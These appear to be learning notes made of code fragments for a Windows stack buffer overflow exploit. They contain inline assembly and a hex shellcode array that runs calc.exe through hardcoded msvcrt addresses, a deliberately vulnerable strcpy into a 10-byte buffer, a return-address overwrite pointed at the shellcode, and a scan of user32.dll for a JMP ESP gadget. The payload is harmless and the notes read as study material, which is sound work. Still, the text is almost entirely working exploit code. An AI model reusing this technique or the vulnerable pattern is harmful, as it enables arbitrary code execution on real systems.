system("calc.exe");
    exit(0);

     __asm
     {
         xor eax, eax
         push eax
         mov byte ptr [esp], ‘l‘
         mov byte ptr [esp+1], ‘l‘
         push ‘d.tr‘
         push ‘cvsm‘ // push msvcrt.dll 0 0, 12 bytes
         mov eax, esp
         push eax // string "msvcrt.dll" address
         mov eax, 7c801d7bh//LoadLibraryA msvcrt.dll
         call eax
 
         xor eax, eax
         push eax
         push ‘exe.‘
         push ‘clac‘ // push calc.exe 0 0 0 0, 12 bytes
         mov eax, esp        
         push eax // string "calc.exe" address
         mov eax,77BF93C7h//system
         call eax
         
         xor eax, eax
         push eax
         mov eax,77C09E7Eh//exit(0)
         call eax
     }

    unsigned char uc[] = 
        "\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
        "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
        "\xD0";
    typedef void (*FUNC)();
    ((FUNC)&uc)();

    void func1(char* s)
    {
        char buf[10];
        strcpy(buf, s);
    }
    char ch[] = "0123456789123456";//integer multiple(4)
    DWORD* pEIP = (DWORD*)&ch[12];//retn address, +12 realease，+16 debug    
    *pEIP = (DWORD)uc;//retn address point to ShellCode
    func1(ch);

    HMODULE hMod = LoadLibrary("user32.dll");
    unsigned char uc[] = 
        "1234567890123456\x53\x93\xD2\x77\x33\xC0\x50\xC6\x04\x24\x6C\xC6\x44\x24\x01\x6C\x68\x72\x74\x2E"
        "\x64\x68\x6D\x73\x76\x63\x8B\xC4\x50\xB8\x7B\x1D\x80\x7C\xFF\xD0"
        "\x33\xC0\x50\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x8B\xC4\x50"
        "\xB8\xC7\x93\xBF\x77\xFF\xD0\x33\xC0\x50\xB8\x7E\x9E\xC0\x77\xFF"
        "\xD0";
    func1((char*)uc);

    HMODULE hMod = LoadLibrary("msvcrt.dll");
    if (hMod)
    {
        printf("%p\r\n", GetProcAddress(hMod, "system"));//77BF93C7
        printf("%p\r\n", GetProcAddress(hMod, "exit"));//77C09E7E
        FreeLibrary(hMod);
    }      

    HMODULE hMod = LoadLibrary("user32.dll");
     if (hMod)
     {
         PBYTE pTravel = (PBYTE)hMod;
         BOOL bLoop = TRUE;
         for (DWORD i = 0; bLoop; i++)
         {
             //FF E0        JMP EAX
             //FF E1        JMP ECX
             //FF E2        JMP EDX
             //FF E3        JMP EBX
             //FF E4        JMP ESP
             //FF E5        JMP EBP
             //FF E6        JMP ESI
             //FF E7        JMP EDI
 
             //FF D0        CALL EAX
             //FF D1        CALL ECX
             //FF D2        CALL EDX
             //FF D3        CALL EBX
             //FF D4        CALL ESP
             //FF D5        CALL EBP
             //FF D6        CALL ESI
             //FF D7        CALL EDI
             try
             {
                 if(pTravel[i] == 0xFF && pTravel[i+1] == 0xE4)
                 {                    
                     printf("%p\r\n", pTravel + i);//77D29353
                     break;
                 }
             }
             catch(...)
             {                
                 bLoop = FALSE;
             }
         }
         FreeLibrary(hMod);
     }